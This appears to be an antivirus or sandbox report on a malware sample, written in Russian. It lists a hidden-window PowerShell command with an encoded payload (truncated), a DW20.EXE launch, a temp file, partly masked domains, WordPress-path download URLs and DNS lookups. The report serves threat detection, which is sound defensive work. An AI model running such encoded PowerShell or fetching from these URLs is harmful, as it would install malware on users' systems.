Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABZAG0AdgB3AGgAbQB0AHYAZwBrAD0AJwBCAGwAagByAGMAeQBtAHIAYwBsAGoAJwA7ACQATgBmAG0AdQBmAHYAYwBtAGgAYgBrAHEAcQAgAD0AIAAnADkANwA4ACcAOwAkAEIAZABiAHAAagBoAHAAagBpAD0AJwBOAGIAbQB1AGoAZwB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1584
- %TEMP%\1388128.cvr
- 'ja###uang.com':80
- 'ja###uang.com':443
- 'my##ol.biz':443
- 'am####chondo.com':80
- http://www.ja###uang.com/wp-content/wfwwwTbw/
- http://am####chondo.com/wp-admin/qdedi66f4-ts7-841192/
- 'ja###uang.com':443
- 'my##ol.biz':443
- DNS ASK fr####zonecafe.com
- DNS ASK ja###uang.com
- DNS ASK er###pich.com
- DNS ASK my##ol.biz
- DNS ASK am####chondo.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABZAG0AdgB3AGgAbQB0AHYAZwBrAD0AJwBCAGwAagByAGMAeQBtAHIAYwBsAGoAJwA7ACQATgBmAG0AdQBmAHYAYwBtAGgAYgBrAHEAcQAgAD0AIAAnADkANwA4ACcAOwAkAEIAZABiAHAAagBoAHAAagBpAD0AJwBOAGIAbQB1AGoAZwB...' (со скрытым окном)